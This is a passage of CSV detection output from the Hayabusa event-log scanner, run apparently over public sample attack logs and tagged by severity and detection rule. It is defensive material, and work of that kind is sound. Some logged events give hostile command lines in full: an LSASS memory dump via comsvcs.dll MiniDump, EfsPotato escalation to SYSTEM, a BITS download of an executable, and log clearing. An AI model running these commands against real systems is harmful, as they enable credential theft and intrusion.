10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-13 15:17:18.087 +09:00,sv-dc.hinokabegakure-no-sato.local,59,informational,Bits Job Creation,Job Title: test : URL: http://192.168.10.254:80/calc.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/YamatoSecurity/T1197_BITS Jobs/Windows-BitsClient.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: c:\temp\EfsPotato.exe whoami : Path: C:\temp\EfsPotato.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\temp\EfsPotato.exe whoami,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.250 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe"" -Embedding : Path: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-10-19 23:33:13.262 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx +2021-10-19 23:40:28.001 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx +2021-10-19 23:42:41.218 +09:00,FS03.offsec.lan,4728,medium,User added to global security group,Member added: - : SID: S-1-5-21-3410678313-1251427014-1131291384-1004 : Group: None : Subject user: admmig : Subject domain: OFFSEC,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx +2021-10-19 23:42:41.234 +09:00,FS03.offsec.lan,4720,medium,Local user account created,User: toto3 : SID:S-1-5-21-3410678313-1251427014-1131291384-1004,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx +2021-10-19 23:44:30.780 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx +2021-10-19 23:45:16.394 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx +2021-10-20 22:39:12.731 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,informational,Logon Type 9 - NewCredentials,User: admmig : Workstation: - : IP Address: ::1 : Port: 0 : LogonID: 0x266e045 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x266e045,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:21.730 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: OFFSEC\admmig : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,PowerShell Get-Process LSASS,,rules/sigma/process_creation/win_susp_powershell_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\76nivOxA.dmp full : Path: C:\Windows\System32\rundll32.exe : User: OFFSEC\admmig : Parent Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,critical,Lsass Memory Dump via Comsvcs DLL,,rules/sigma/process_access/sysmon_lsass_dump_comsvcs_dll.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 49192 : LogonID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 38940 : LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:13.725 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:22.291 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,PowerShell Get-Process LSASS in ScriptBlock,,rules/sigma/powershell/powershell_script/powershell_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: cscript.exe //e:jscript testme.js : Path: C:\Windows\System32\cscript.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,medium,WSF/JSE/JS/VBA/VBE File Execution,,rules/sigma/process_creation/win_susp_script_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /generic:Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip /pass:tWIMmIF /user:"""" : Path: C:\Windows\System32\cmdkey.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx +2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec 